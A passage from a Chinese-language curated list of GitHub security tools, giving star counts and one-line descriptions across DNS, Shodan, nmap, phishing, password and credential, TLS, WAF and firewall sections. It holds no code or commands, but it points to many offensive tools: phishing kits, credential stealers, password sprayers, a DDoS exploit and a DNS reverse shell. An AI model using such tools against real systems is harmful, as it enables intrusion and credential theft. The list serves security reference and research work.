connecting to each other or to a common endpoint. No need to control a DNS Name Server.\n- [**265**星][2m] [Go] [sensepost/godoh](https://github.com/sensepost/godoh) A DNS-over-HTTPS Command & Control Proof of Concept \n- [**263**星][3m] [Go] [zmap/zdns](https://github.com/zmap/zdns) 快速DNS查找, 命令行工具\n- [**258**星][7d] [Go] [erbbysam/dnsgrep](https://github.com/erbbysam/dnsgrep) Quickly Search Large DNS Datasets\n- [**256**星][3m] [Py] [qunarcorp/open_dnsdb](https://github.com/qunarcorp/open_dnsdb) OpenDnsdb 是去哪儿网OPS团队开源的基于Python语言的DNS管理系统\n- [**252**星][8m] [Py] [dirkjanm/adidnsdump](https://github.com/dirkjanm/adidnsdump) Active Directory Integrated DNS dumping by any authenticated user\n- [**251**星][4m] [C#] [kevin-robertson/inveighzero](https://github.com/kevin-robertson/inveighzero) Windows C# LLMNR/mDNS/NBNS/DNS spoofer/man-in-the-middle tool\n- [**241**星][23d] [Py] [mandatoryprogrammer/trusttrees](https://github.com/mandatoryprogrammer/trusttrees) a script to recursively follow all the possible delegation paths for a target domain and graph the relationships between various nameservers along the way.\n\n\n### Shodan\n\n\n- [**1214**星][8d] [Py] [achillean/shodan-python](https://github.com/achillean/shodan-python) The official Python library for Shodan\n- [**1052**星][5m] [Py] [woj-ciech/kamerka](https://github.com/woj-ciech/kamerka) 利用Shodan构建交互式摄像头地图\n- [**890**星][3m] [jakejarvis/awesome-shodan-queries](https://github.com/jakejarvis/awesome-shodan-queries) \n- [**858**星][3m] [Py] [649/memcrashed-ddos-exploit](https://github.com/649/memcrashed-ddos-exploit) DDoS attack tool for sending forged UDP packets to vulnerable Memcached servers obtained using Shodan API\n - 重复区段: [渗透->工具->DDOS](#a0897294e74a0863ea8b83d11994fad6) |\n- [**391**星][3d] [Py] [random-robbie/my-shodan-scripts](https://github.com/random-robbie/my-shodan-scripts) Collection of Scripts for shodan searching stuff.\n- [**378**星][2m] [Py] [pielco11/fav-up](https://github.com/pielco11/fav-up) IP lookup from favicon using Shodan\n- [**234**星][11m] [Py] [nethunteros/punter](https://github.com/nethunteros/punter) 使用 DNSDumpster, WHOIS, Reverse WHOIS 挖掘域名\n- [**220**星][6d] [Py] [shodansploit/shodansploit](https://github.com/shodansploit/shodansploit) \n\n\n### nmap\n\n\n- [**3609**星][7d] [C] [nmap/nmap](https://github.com/nmap/nmap) Nmap\n- [**2116**星][7m] [Py] [calebmadrigal/trackerjacker](https://github.com/calebmadrigal/trackerjacker) 映射你没连接到的Wifi网络, 类似于NMap, 另外可以追踪设备\n- [**1871**星][20d] [Lua] [vulnerscom/nmap-vulners](https://github.com/vulnerscom/nmap-vulners) NSE script based on Vulners.com API\n- [**1536**星][5d] [C++] [nmap/npcap](https://github.com/nmap/npcap) Nmap项目的针对Windows系统的数据包嗅探库,基于WinPcap/Libpcap,用NDIS6和LWF做了升级\n- [**1317**星][3m] [Lua] [scipag/vulscan](https://github.com/scipag/vulscan) Nmap 模块,将 Nmap 转化为高级漏洞扫描器\n- [**1029**星][1m] [Shell] [trimstray/sandmap](https://github.com/trimstray/sandmap) 使用NMap引擎, 辅助网络和系统侦查(reconnaissance)\n- [**887**星][12m] [Py] [rev3rsesecurity/webmap](https://github.com/rev3rsesecurity/webmap) Nmap Web Dashboard and Reporting\n- [**849**星][5d] [Py] [x90skysn3k/brutespray](https://github.com/x90skysn3k/brutespray) 获取 nmapGNMAP 输出,自动调用 Medusa 使用默认证书爆破服务(brute-forces services)\n- [**733**星][5m] [Lua] [cldrn/nmap-nse-scripts](https://github.com/cldrn/nmap-nse-scripts) My collection of nmap NSE scripts\n- [**696**星][2m] [Py] [iceyhexman/onlinetools](https://github.com/iceyhexman/onlinetools) 在线cms识别|信息泄露|工控|系统|物联网安全|cms漏洞扫描|nmap端口扫描|子域名获取|待续..\n- [**503**星][1y] [XSLT] [honze-net/nmap-bootstrap-xsl](https://github.com/honze-net/nmap-bootstrap-xsl) A Nmap XSL implementation with Bootstrap.\n- [**394**星][8m] [Py] [savon-noir/python-libnmap](https://github.com/savon-noir/python-libnmap) libnmap is a python library to run nmap scans, parse and diff scan results. It supports python 2.6 up to 3.4. It's wonderful.\n- [**328**星][10m] [Py] [samhaxr/hackbox](https://github.com/samhaxr/hackbox) 集合了某些Hacking工具和技巧的攻击工具\n- [**308**星][1y] [Java] [s4n7h0/halcyon](https://github.com/s4n7h0/halcyon) First IDE for Nmap Script (NSE) Development.\n- [**283**星][1y] [Ruby] [danmcinerney/pentest-machine](https://github.com/danmcinerney/pentest-machine) Automates some pentest jobs via nmap xml file\n- [**261**星][1y] [Shell] [m4ll0k/autonse](https://github.com/m4ll0k/autonse) Massive NSE (Nmap Scripting Engine) AutoSploit and AutoScanner\n- [**257**星][1y] [Java] [danicuestasuarez/nmapgui](https://github.com/danicuestasuarez/nmapgui) Advanced Graphical User Interface for NMap\n- [**246**星][8m] [Lua] [rvn0xsy/nse_vuln](https://github.com/rvn0xsy/nse_vuln) Nmap扫描、漏洞利用脚本\n- [**233**星][6m] [Py] [maaaaz/nmaptocsv](https://github.com/maaaaz/nmaptocsv) A simple python script to convert Nmap output to CSV\n- [**223**星][12d] [Py] [rackerlabs/scantron](https://github.com/rackerlabs/scantron) A distributed nmap / masscan scanning framework\n- [**204**星][6m] [Py] [hellogoldsnakeman/masnmapscan-v1.0](https://github.com/hellogoldsnakeman/masnmapscan-v1.0) 一款端口扫描器。整合了masscan和nmap两款扫描器,masscan扫描端口,nmap扫描端口对应服务,二者结合起来实现了又快又好地扫描。并且加入了防火墙的功能\n\n\n\n\n***\n\n\n## 文章\n\n\n### 新添加\n\n\n\n\n\n\n# 社工(SET)&&钓鱼&&鱼叉攻击\n\n\n***\n\n\n## 工具\n\n\n### 未分类-SET\n\n\n- [**1363**星][2m] [CSS] [undeadsec/socialfish](https://github.com/undeadsec/socialfish) 网络钓鱼培训与信息收集\n - 重复区段: [侦察->工具->未分类-OSINT](#05ab1b75266fddafc7195f5b395e4d99) |\n- [**754**星][4m] [Py] [threatexpress/domainhunter](https://github.com/threatexpress/domainhunter) Checks expired domains for categorization/reputation and Archive.org history to determine good candidates for phishing and C2 domain names\n - 重复区段: [侦察->工具->未分类-OSINT](#05ab1b75266fddafc7195f5b395e4d99) |\n- [**658**星][18d] [Py] [thewhiteh4t/seeker](https://github.com/thewhiteh4t/seeker) Accurately Locate Smartphones using Social Engineering\n- [**342**星][2m] [Py] [raikia/uhoh365](https://github.com/raikia/uhoh365) A script that can see if an email address is valid in Office365 (user/email enumeration). This does not perform any login attempts, is unthrottled, and is incredibly useful for social engineering assessments to find which emails exist and which don't.\n\n\n### 社工\n\n\n- [**4966**星][4d] [Py] [trustedsec/social-engineer-toolkit](https://github.com/trustedsec/social-engineer-toolkit) The Social-Engineer Toolkit (SET) repository from TrustedSec - All new versions of SET will be deployed here.\n\n\n### 钓鱼&&Phish\n\n\n- [**8455**星][8d] [Py] [wifiphisher/wifiphisher](https://github.com/wifiphisher/wifiphisher) 流氓AP框架, 用于RedTeam和Wi-Fi安全测试\n - 重复区段: [无线->未分类-WiFi](#d4efda1853b2cb0909727188116a2a8c) |\n- [**4242**星][4d] [Go] [gophish/gophish](https://github.com/gophish/gophish) 网络钓鱼工具包\n- [**2829**星][2m] [Go] [kgretzky/evilginx2](https://github.com/kgretzky/evilginx2) 独立的MITM攻击工具,用于登录凭证钓鱼,可绕过双因素认证\n- [**2131**星][2m] [Py] [elceef/dnstwist](https://github.com/elceef/dnstwist) 域名置换引擎,用于检测打字错误,网络钓鱼和企业间谍活动\n - 重复区段: [侦察->工具->DNS](#a695111d8e30d645354c414cb27b7843) |\n- [**1400**星][9m] [JS] [anttiviljami/browser-autofill-phishing](https://github.com/anttiviljami/browser-autofill-phishing) A simple demo of phishing by abusing the browser autofill feature\n- [**1369**星][10m] [HTML] [thelinuxchoice/blackeye](https://github.com/thelinuxchoice/blackeye) The most complete Phishing Tool, with 32 templates +1 customizable\n- [**1019**星][22d] [Py] [securestate/king-phisher](https://github.com/securestate/king-phisher) Phishing Campaign Toolkit\n- [**996**星][2m] [Py] [x0rz/phishing_catcher](https://github.com/x0rz/phishing_catcher) 使用Certstream 捕获钓鱼域名\n- [**968**星][19d] [HTML] [darksecdevelopers/hiddeneye](https://github.com/darksecdevelopers/hiddeneye) Modern Phishing Tool With Advanced Functionality And Multiple Tunnelling Services [ Android-Support-Available ]\n- [**918**星][8m] [HTML] [thelinuxchoice/shellphish](https://github.com/thelinuxchoice/shellphish) 针对18个社交媒体的钓鱼工具:Instagram, Facebook, Snapchat, Github, Twitter, Yahoo, Protonmail, Spotify, Netflix, Linkedin, Wordpress, Origin, Steam, Microsoft, InstaFollowers, Gitlab, Pinterest\n- [**842**星][1m] [PHP] [raikia/fiercephish](https://github.com/Raikia/FiercePhish) FiercePhish is a full-fledged phishing framework to manage all phishing engagements. It allows you to track separate phishing campaigns, schedule sending of emails, and much more.\n- [**537**星][2m] [Py] [shellphish/driller](https://github.com/shellphish/driller) augmenting AFL with symbolic execution!\n- [**460**星][4d] [Py] [angr/rex](https://github.com/angr/rex) Shellphish's automated exploitation engine, originally created for the Cyber Grand Challenge.\n- [**351**星][5m] [Py] [tatanus/spf](https://github.com/tatanus/spf) SpeedPhishing Framework\n- [**300**星][11m] [Py] [mr-un1k0d3r/catmyphish](https://github.com/Mr-Un1k0d3r/CatMyPhish) Search for categorized domain\n- [**274**星][1m] [Go] [muraenateam/muraena](https://github.com/muraenateam/muraena) Muraena is an almost-transparent reverse proxy aimed at automating phishing and post-phishing activities.\n- [**242**星][3m] [Py] [atexio/mercure](https://github.com/atexio/mercure) 对员工进行网络钓鱼的培训\n- [**233**星][1y] [Jupyter Notebook] [wesleyraptor/streamingphish](https://github.com/wesleyraptor/streamingphish) 使用受监督的机器学习, 从证书透明度(Certificate Transparency)日志中检测钓鱼域名\n- [**228**星][4m] [Py] [duo-labs/isthislegit](https://github.com/duo-labs/isthislegit) 收集、分析和回复网络钓鱼邮件的框架\n- [**218**星][9m] [Go] [joncooperworks/judas](https://github.com/joncooperworks/judas) a phishing proxy\n- [**207**星][3d] [JS] [409h/etheraddresslookup](https://github.com/409h/etheraddresslookup) Adds links to strings that look like Ethereum addresses to your favourite blockchain explorer. Adds protection against private key phishing. Offers custom site bookmarks.\n- [**205**星][3m] [Py] [dionach/phemail](https://github.com/dionach/phemail) PhEmail is a python open source phishing email tool that automates the process of sending phishing emails as part of a social engineering test\n\n\n### 鱼叉攻击\n\n\n\n\n\n\n***\n\n\n## 文章\n\n\n### 新添加的\n\n\n\n\n\n\n# 环境配置&&分析系统\n\n\n***\n\n\n## 工具\n\n\n### 未分类-Env\n\n\n- [**1678**星][2d] [HTML] [clong/detectionlab](https://github.com/clong/detectionlab) Vagrant & Packer scripts to build a lab environment complete with security tooling and logging best practices\n- [**1433**星][11d] [Go] [crazy-max/windowsspyblocker](https://github.com/crazy-max/windowsspyblocker) \n- [**1308**星][18d] [C] [cisco-talos/pyrebox](https://github.com/cisco-talos/pyrebox) 逆向沙箱,基于QEMU,Python Scriptable\n- [**1229**星][11m] [JS] [mame82/p4wnp1_aloa](https://github.com/mame82/p4wnp1_aloa) 将 Rapsberry Pi Zero W 转变成灵活的渗透平台\n- [**827**星][1m] [redhuntlabs/redhunt-os](https://github.com/redhuntlabs/redhunt-os) Virtual Machine for Adversary Emulation and Threat Hunting\n- [**800**星][3m] [sh4hin/androl4b](https://github.com/sh4hin/androl4b) 用于评估Android应用程序,逆向工程和恶意软件分析的虚拟机\n- [**564**星][6m] [Ruby] [sliim/pentest-env](https://github.com/sliim/pentest-env) Pentest environment deployer (kali linux + targets) using vagrant and chef.\n- [**214**星][12m] [Shell] [proxycannon/proxycannon-ng](https://github.com/proxycannon/proxycannon-ng) 使用多个云环境构建私人僵尸网络, 用于渗透测试和RedTeaming\n\n\n### Linux-Distro\n\n\n- [**2927**星][4d] [Py] [trustedsec/ptf](https://github.com/trustedsec/ptf) 创建基于Debian/Ubuntu/ArchLinux的渗透测试环境\n- [**2375**星][18d] [security-onion-solutions/security-onion](https://github.com/security-onion-solutions/security-onion) Linux distro for intrusion detection, enterprise security monitoring, and log management\n- [**1489**星][t] [Shell] [blackarch/blackarch](https://github.com/blackarch/blackarch) BlackArch Linux is an Arch Linux-based distribution for penetration testers and security researchers.\n- [**347**星][t] [Shell] [archstrike/archstrike](https://github.com/archstrike/archstrike) An Arch Linux repository for security professionals and enthusiasts. Done the Arch Way and optimized for i686, x86_64, ARMv6, ARMv7 and ARMv8.\n\n\n### 环境自动配置&&自动安装\n\n\n- [**3142**星][3m] [PS] [fireeye/commando-vm](https://github.com/fireeye/commando-vm) Complete Mandiant Offensive VM (Commando VM), a fully customizable Windows-based pentesting virtual machine distribution. commandovm@fireeye.com\n- [**1748**星][2m] [PS] [fireeye/flare-vm](https://github.com/fireeye/flare-vm) 火眼发布用于 Windows 恶意代码分析的虚拟机:FLARE VM\n\n\n\n\n***\n\n\n## 文章\n\n\n### 新添加的\n\n\n\n\n\n\n# 密码&&凭证&&认证\n\n\n***\n\n\n## 工具\n\n\n### 未分类-Password\n\n\n- [**4889**星][13d] [Py] [alessandroz/lazagne](https://github.com/alessandroz/lazagne) Credentials recovery project\n- [**1457**星][1y] [Py] [d4vinci/cr3dov3r](https://github.com/d4vinci/cr3dov3r) Know the dangers of credential reuse attacks.\n- [**1384**星][24d] [Shell] [drduh/pwd.sh](https://github.com/drduh/pwd.sh) GPG symmetric password manager\n- [**1282**星][19d] [Py] [pyauth/pyotp](https://github.com/pyauth/pyotp) Python One-Time Password Library\n- [**1034**星][1y] [PS] [danmcinerney/icebreaker](https://github.com/danmcinerney/icebreaker) Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment\n- [**1000**星][10d] [Ruby] [mdp/rotp](https://github.com/mdp/rotp) Ruby One Time Password library\n- [**913**星][7d] [C] [cossacklabs/themis](https://github.com/cossacklabs/themis) 用于存储或通信的加密库,可用于Swift, ObjC, Android, С++, JS, Python, Ruby, PHP, Go。\n- [**814**星][9m] [Py] [nccgroup/featherduster](https://github.com/nccgroup/featherduster) 自动化的密码分析工具,模块化\n- [**805**星][2m] [Py] [hellman/xortool](https://github.com/hellman/xortool) 分析多字节异或密码\n- [**740**星][1m] [Py] [ricterz/genpass](https://github.com/ricterz/genpass) 中国特色的弱口令生成器\n- [**523**星][3m] [Py] [unode/firefox_decrypt](https://github.com/unode/firefox_decrypt) Firefox Decrypt is a tool to extract passwords from Mozilla (Firefox/Thunderbird/SeaMonkey) profiles\n- [**507**星][3m] [Py] [byt3bl33d3r/sprayingtoolkit](https://github.com/byt3bl33d3r/sprayingtoolkit) Scripts to make password spraying attacks against Lync/S4B & OWA a lot quicker, less painful and more efficient\n- [**485**星][1y] [JS] [emilbayes/secure-password](https://github.com/emilbayes/secure-password) Making Password storage safer for all\n- [**454**星][1y] [Go] [ncsa/ssh-auditor](https://github.com/ncsa/ssh-auditor) 扫描网络中的弱SSH密码\n- [**399**星][2m] [Py] [x899/chrome_password_grabber](https://github.com/x899/chrome_password_grabber) Get unencrypted 'Saved Password' from Google Chrome\n- [**391**星][1y] [Shell] [mthbernardes/sshlooter](https://github.com/mthbernardes/sshlooter) Script to steal passwords from ssh.\n- [**369**星][4m] [Ruby] [digininja/pipal](https://github.com/digininja/pipal) Pipal, THE password analyser\n- [**361**星][21d] [Py] [davidtavarez/pwndb](https://github.com/davidtavarez/pwndb) Search for leaked credentials\n- [**341**星][11m] [C] [1clickman/3snake](https://github.com/1clickman/3snake) reads memory from sshd and sudo system calls that handle password based authentication\n- [**295**星][6m] [C#] [raikia/credninja](https://github.com/raikia/credninja) A multithreaded tool designed to identify if credentials are valid, invalid, or local admin valid credentials within a network at-scale via SMB, plus now with a user hunter\n- [**290**星][3m] [JS] [kspearrin/ff-password-exporter](https://github.com/kspearrin/ff-password-exporter) Easily export your passwords from Firefox.\n- [**289**星][7m] [Shell] [greenwolf/spray](https://github.com/Greenwolf/Spray) A Password Spraying tool for Active Directory Credentials by Jacob Wilkin(Greenwolf)\n- [**286**星][17d] [Py] [xfreed0m/rdpassspray](https://github.com/xfreed0m/rdpassspray) Python3 tool to perform password spraying using RDP\n- [**256**星][5m] [C] [rub-syssec/omen](https://github.com/rub-syssec/omen) Ordered Markov ENumerator - Password Guesser\n- [**212**星][4m] [Ruby] [bdmac/strong_password](https://github.com/bdmac/strong_password) Entropy-based password strength checking for Ruby and Rails.\n\n\n### 密码\n\n\n- [**7035**星][t] [C] [hashcat/hashcat](https://github.com/hashcat/hashcat) 世界上最快最先进的密码恢复工具\n - 重复区段: [后渗透->工具->未分类-post-exp](#12abc279c69d1fcf10692b9cb89bcdf7) |\n- [**5173**星][1y] [JS] [samyk/poisontap](https://github.com/samyk/poisontap) Exploits locked/password protected computers over USB, drops persistent WebSocket-based backdoor, exposes internal router, and siphons cookies using Raspberry Pi Zero & Node.js.\n- [**3209**星][2d] [C] [magnumripper/johntheripper](https://github.com/magnumripper/johntheripper) This is the official repo for John the Ripper, \"Jumbo\" version. The \"bleeding-jumbo\" branch is based on 1.9.0-Jumbo-1 which was released on May 14, 2019. An import of the \"core\" version of john this jumbo was based on (or newer) is found in the \"master\" branch (CVS:\n- [**2583**星][2m] [C] [huntergregal/mimipenguin](https://github.com/huntergregal/mimipenguin) dump 当前Linux用户的登录密码\n- [**1162**星][8m] [Py] [mebus/cupp](https://github.com/mebus/cupp) Common User Passwords Profiler (CUPP)\n- [**874**星][5m] [Go] [fireeye/gocrack](https://github.com/fireeye/gocrack) 火眼开源的密码破解工具,可以跨多个 GPU 服务器执行任务\n- [**852**星][3m] [Go] [ukhomeoffice/repo-security-scanner](https://github.com/ukhomeoffice/repo-security-scanner) CLI tool that finds secrets accidentally committed to a git repo, eg passwords, private keys\n- [**652**星][1y] [Java] [faizann24/wifi-bruteforcer-fsecurify](https://github.com/faizann24/wifi-bruteforcer-fsecurify) Android app,无需 Root 即可爆破 Wifi 密码\n- [**602**星][7m] [C] [hashcat/hashcat-utils](https://github.com/hashcat/hashcat-utils) Small utilities that are useful in advanced password cracking\n- [**598**星][1y] [Py] [brannondorsey/passgan](https://github.com/brannondorsey/passgan) A Deep Learning Approach for Password Guessing (\n- [**593**星][4m] [Py] [thewhiteh4t/pwnedornot](https://github.com/thewhiteh4t/pwnedornot) OSINT Tool for Finding Passwords of Compromised Email Addresses\n- [**493**星][1y] [PS] [dafthack/domainpasswordspray](https://github.com/dafthack/domainpasswordspray) DomainPasswordSpray is a tool written in PowerShell to perform a password spray attack against users of a domain. By default it will automatically generate the userlist from the domain. BE VERY CAREFUL NOT TO LOCKOUT ACCOUNTS!\n- [**353**星][8m] [Py] [iphelix/pack](https://github.com/iphelix/pack) PACK (Password Analysis and Cracking Kit)\n- [**334**星][2m] [CSS] [guyoung/captfencoder](https://github.com/guyoung/captfencoder) CaptfEncoder是一款跨平台网络安全工具套件,提供网络安全相关编码转换、古典密码、密码学、特殊编码等工具,并聚合各类在线工具。\n- [**333**星][26d] [JS] [auth0/repo-supervisor](https://github.com/auth0/repo-supervisor) Serverless工具,在pull请求中扫描源码,搜索密码及其他秘密\n\n\n### 认证&&Authenticate\n\n\n- [**901**星][1m] [Go] [smallstep/cli](https://github.com/smallstep/cli) 🧰 A zero trust swiss army knife for working with X509, OAuth, JWT, OATH OTP, etc.\n- [**665**星][9m] [C] [samdenty/wi-pwn](https://github.com/samdenty/Wi-PWN) performs deauth attacks on cheap Arduino boards\n- [**298**星][15d] [Java] [shred/acme4j](https://github.com/shred/acme4j) a protocol that a certificate authority (CA) and an applicant can use to automate the process of verification and certificate issuance\n- [**281**星][4m] [Java] [ztosec/secscan-authcheck](https://github.com/ztosec/secscan-authcheck) 越权检测工具\n- [**214**星][1y] [C#] [leechristensen/spoolsample](https://github.com/leechristensen/spoolsample) PoC tool to coerce Windows hosts authenticate to other machines via the MS-RPRN RPC interface. This is possible via other protocols as well.\n\n\n\n\n***\n\n\n## 文章\n\n\n### 新添加的\n\n\n\n\n\n\n# 辅助周边\n\n\n***\n\n\n## 未分类-Assist\n\n\n- [**26031**星][3d] [Py] [certbot/certbot](https://github.com/certbot/certbot) Certbot is EFF's tool to obtain certs from Let's Encrypt and (optionally) auto-enable HTTPS on your server. It can also act as a client for any other CA that uses the ACME protocol.\n- [**7784**星][2d] [JS] [gchq/cyberchef](https://github.com/gchq/cyberchef) The Cyber Swiss Army Knife - a web app for encryption, encoding, compression and data analysis\n- [**4909**星][3m] [Rust] [sharkdp/hexyl](https://github.com/sharkdp/hexyl) 命令行中查看hex\n- [**4402**星][] [JS] [cure53/dompurify](https://github.com/cure53/dompurify) a DOM-only, super-fast, uber-tolerant XSS sanitizer for HTML, MathML and SVG. DOMPurify works with a secure default, but offers a lot of configurability and hooks. Demo:\n- [**3239**星][7m] [HTML] [leizongmin/js-xss](https://github.com/leizongmin/js-xss) Sanitize untrusted HTML (to prevent XSS) with a configuration specified by a Whitelist\n- [**3097**星][8d] [Shell] [trimstray/htrace.sh](https://github.com/trimstray/htrace.sh) My simple Swiss Army knife for http/https troubleshooting and profiling.\n- [**1223**星][1y] [Go] [cloudflare/redoctober](https://github.com/cloudflare/redoctober) Go server for two-man rule style file encryption and decryption.\n- [**1022**星][9m] [Go] [maliceio/malice](https://github.com/maliceio/malice) 开源版的VirusTotal\n- [**508**星][6d] [Py] [certtools/intelmq](https://github.com/certtools/intelmq) IntelMQ is a solution for IT security teams for collecting and processing security feeds using a message queuing protocol.\n- [**481**星][5m] [JS] [ehrishirajsharma/swiftnessx](https://github.com/ehrishirajsharma/swiftnessx) A cross-platform note-taking & target-tracking app for penetration testers.\n\n\n***\n\n\n## TLS&&SSL&&HTTPS\n\n\n- [**22020**星][23d] [Go] [filosottile/mkcert](https://github.com/filosottile/mkcert) A simple zero-config tool to make locally trusted development certificates with any names you'd like.\n- [**4322**星][12d] [Py] [diafygi/acme-tiny](https://github.com/diafygi/acme-tiny) A tiny script to issue and renew TLS certs from Let's Encrypt\n- [**1694**星][9d] [HTML] [chromium/badssl.com](https://github.com/chromium/badssl.com) \n- [**1230**星][1m] [Go] [jsha/minica](https://github.com/jsha/minica) minica is a small, simple CA intended for use in situations where the CA operator also operates each host where a certificate will be used.\n- [**1211**星][2d] [Go] [smallstep/certificates](https://github.com/smallstep/certificates) 私有的证书颁发机构(X.509和SSH)和ACME服务器,用于安全的自动证书管理,因此您可以在SSH和SSO处使用TLS\n- [**833**星][10m] [Py] [ietf-wg-acme/acme](https://github.com/ietf-wg-acme/acme) A protocol for automating certificate issuance\n- [**740**星][21d] [Shell] [dokku/dokku-letsencrypt](https://github.com/dokku/dokku-letsencrypt) BETA: Automatic Let's Encrypt TLS Certificate installation for dokku\n- [**691**星][5m] [C++] [google/certificate-transparency](https://github.com/google/certificate-transparency) Auditing for TLS certificates.\n- [**512**星][1m] [Java] [rub-nds/tls-attacker](https://github.com/rub-nds/tls-attacker) TLS-Attacker is a Java-based framework for analyzing TLS libraries. It is developed by the Ruhr University Bochum (\n- [**469**星][3m] [Go] [square/certigo](https://github.com/square/certigo) A utility to examine and validate certificates in a variety of formats\n- [**279**星][1m] [Shell] [trimstray/mkchain](https://github.com/trimstray/mkchain) 建立从根证书到最终用户证书的有效的SSL证书链, 修复不完整的证书链并下载所有缺少的CA证书\n- [**229**星][7m] [Shell] [r00t-3xp10it/meterpreter_paranoid_mode-ssl](https://github.com/r00t-3xp10it/meterpreter_paranoid_mode-ssl) Meterpreter Paranoid Mode - SSL/TLS connections\n- [**225**星][12m] [Shell] [nviso-be/magisktrustusercerts](https://github.com/nviso-be/magisktrustusercerts) A Magisk module that automatically adds user certificates to the system root CA store\n\n\n# 防护&&Defense\n\n\n***\n\n\n## 工具\n\n\n### 未分类-Defense\n\n\n- [**9862**星][9m] [imthenachoman/how-to-secure-a-linux-server](https://github.com/imthenachoman/how-to-secure-a-linux-server) An evolving how-to guide for securing a Linux server.\n- [**747**星][12m] [Py] [infobyte/spoilerwall](https://github.com/infobyte/spoilerwall) Spoilerwall introduces a brand new concept in the field of network hardening. Avoid being scanned by spoiling movies on all your ports!\n- [**657**星][6m] [TeX] [bettercrypto/applied-crypto-hardening](https://github.com/bettercrypto/applied-crypto-hardening) Best Current Practices regarding secure online communication and configuration of services using cryptography.\n- [**639**星][2d] [Py] [binarydefense/artillery](https://github.com/binarydefense/artillery) The Artillery Project is an open-source blue team tool designed to protect Linux and Windows operating systems through multiple methods.\n- [**589**星][21d] [Ruby] [dev-sec/ansible-ssh-hardening](https://github.com/dev-sec/ansible-ssh-hardening) This Ansible role provides numerous security-related ssh configurations, providing all-round base protection.\n- [**570**星][29d] [Py] [graphenex/graphenex](https://github.com/graphenex/graphenex) Automated System Hardening Framework\n- [**499**星][8m] [ernw/hardening](https://github.com/ernw/hardening) Repository of Hardening Guides\n- [**241**星][20d] [Py] [a13xp0p0v/kconfig-hardened-check](https://github.com/a13xp0p0v/kconfig-hardened-check) A script for checking the hardening options in the Linux kernel config\n- [**217**星][27d] [Puppet] [dev-sec/puppet-os-hardening](https://github.com/dev-sec/puppet-os-hardening) This puppet module provides numerous security-related configurations, providing all-round base protection.\n\n\n### WAF\n\n\n- [**5094**星][2m] [Lua] [alexazhou/verynginx](https://github.com/alexazhou/verynginx) A very powerful and friendly nginx base on lua-nginx-module( openresty ) which provide WAF, Control Panel, and Dashboards.\n- [**3294**星][3m] [C] [nbs-system/naxsi](https://github.com/nbs-system/naxsi) NAXSI is an open-source, high performance, low rules maintenance WAF for NGINX\n- [**3207**星][1m] [C++] [spiderlabs/modsecurity](https://github.com/spiderlabs/modsecurity) ModSecurity is an open source, cross platform web application firewall (WAF) engine for Apache, IIS and Nginx that is developed by Trustwave's SpiderLabs. It has a robust event-based programming language which provides protection from a range of attacks against web applications and allows for HTTP traffic monitoring, logging and real-time analys…\n- [**619**星][3m] [Py] [3xp10it/xwaf](https://github.com/3xp10it/xwaf) waf 自动爆破(绕过)工具\n- [**617**星][4m] [Lua] [jx-sec/jxwaf](https://github.com/jx-sec/jxwaf) JXWAF(锦衣盾)是一款基于openresty(nginx+lua)开发的web应用防火墙\n- [**552**星][8m] [Py] [s0md3v/blazy](https://github.com/s0md3v/Blazy) Blazy is a modern login bruteforcer which also tests for CSRF, Clickjacking, Cloudflare and WAF .\n- [**540**星][4d] [Go] [janusec/janusec](https://github.com/janusec/janusec) Janusec Application Gateway, a Golang based application security solution which provides WAF (Web Application Firewall), CC attack defense, unified web administration portal, private key protection, web routing and scalable load balancing.\n- [**481**星][8m] [Java] [chengdedeng/waf](https://github.com/chengdedeng/waf) \n- [**452**星][3d] [PHP] [akaunting/firewall](https://github.com/akaunting/firewall) Web Application Firewall (WAF) package for Laravel\n- [**433**星][9m] [Py] [aws-samples/aws-waf-sample](https://github.com/aws-samples/aws-waf-sample) This repository contains example scripts and sets of rules for the AWS WAF service. Please be aware that the applicability of these examples to specific workloads may vary.\n- [**423**星][6d] [Py] [awslabs/aws-waf-security-automations](https://github.com/awslabs/aws-waf-security-automations) This solution automatically deploys a single web access control list (web ACL) with a set of AWS WAF rules designed to filter common web-based attacks.\n- [**415**星][5d] [C#] [jbe2277/waf](https://github.com/jbe2277/waf) Win Application Framework (WAF) is a lightweight Framework that helps you to create well structured XAML Applications.\n- [**412**星][11m] [C] [titansec/openwaf](https://github.com/titansec/openwaf) Web security protection system based on openresty\n- [**384**星][6d] [PHP] [terrylinooo/shieldon](https://github.com/terrylinooo/shieldon) Web Application Firewall (WAF) for PHP.\n- [**248**星][1y] [Py] [warflop/cloudbunny](https://github.com/warflop/cloudbunny) CloudBunny is a tool to capture the real IP of the server that uses a WAF as a proxy or protection. In this tool we used three search engines to search domain information: Shodan, Censys and Zoomeye.\n- [**216**星][1m] [Py] [stamparm/identywaf](https://github.com/stamparm/identywaf) Blind WAF identification tool\n- [**209**星][7m] [C] [coolervoid/raptor_waf](https://github.com/coolervoid/raptor_waf) Raptor - WAF - Web application firewall using DFA [ Current version ] - Beta\n\n\n### 防火墙&&FireWall\n\n\n- [**4209**星][2m] [Py] [evilsocket/opensnitch](https://github.com/evilsocket/opensnitch) opensnitch:Little Snitch 应用程序防火墙的 GNU/Linux 版本。(Little Snitch:Mac操作系统的应用程序防火墙,能防止应用程序在你不知道的情况下自动访问网络)\n- [**3283**星][11d] [ObjC] [objective-see/lulu](https://github.com/objective-see/lulu) LuLu is the free macOS firewall\n- [**1542**星][6d] [Java] [ukanth/afwall](https://github.com/ukanth/afwall) AFWall+ (Android Firewall +) - iptables based firewall for Android\n- [**1095**星][3m] [PHP] [antonioribeiro/firewall](https://github.com/antonioribeiro/firewall) Firewall package for Laravel applications\n- [**1049**星][8d] [Shell] [firehol/firehol](https://github.com/firehol/firehol) A firewall for humans...\n- [**852**星][20d] [trimstray/iptables-essentials](https://github.com/trimstray/iptables-essentials) Common Firewall Rules and Commands.\n- [**567**星][7m] [Go] [sysdream/chashell](https://github.com/sysdream/chashell) Chashell is a Go reverse shell that communicates over DNS. It can be used to bypass firewalls or tightly restricted networks.\n- [**468**星][6m] [Shell] [vincentcox/bypass-firewalls-by-dns-history](https://github.com/vincentcox/bypass-firewalls-by-dns-history) Firewall bypass script based on DNS history records. This script will search for DNS A history records and check if the server replies for that domain. Handy for bugbounty hunters.\n- [**279**星][11d] [Shell] [geerlingguy/ansible-role-firewall](https://github.com/geerlingguy/ansible-role-firewall) Ansible Role - iptables Firewall configuration.\n- [**261**星][2m] [C#] [wokhansoft/wfn](https://github.com/wokhansoft/wfn) Windows Firewall Notifier extends the default Windows embedded firewall by allowing to handle and notify about outgoing connections, offers real time connections monitoring, connections map, bandwidth usage monitoring and more...\n- [**260**星][4d] [Ruby] 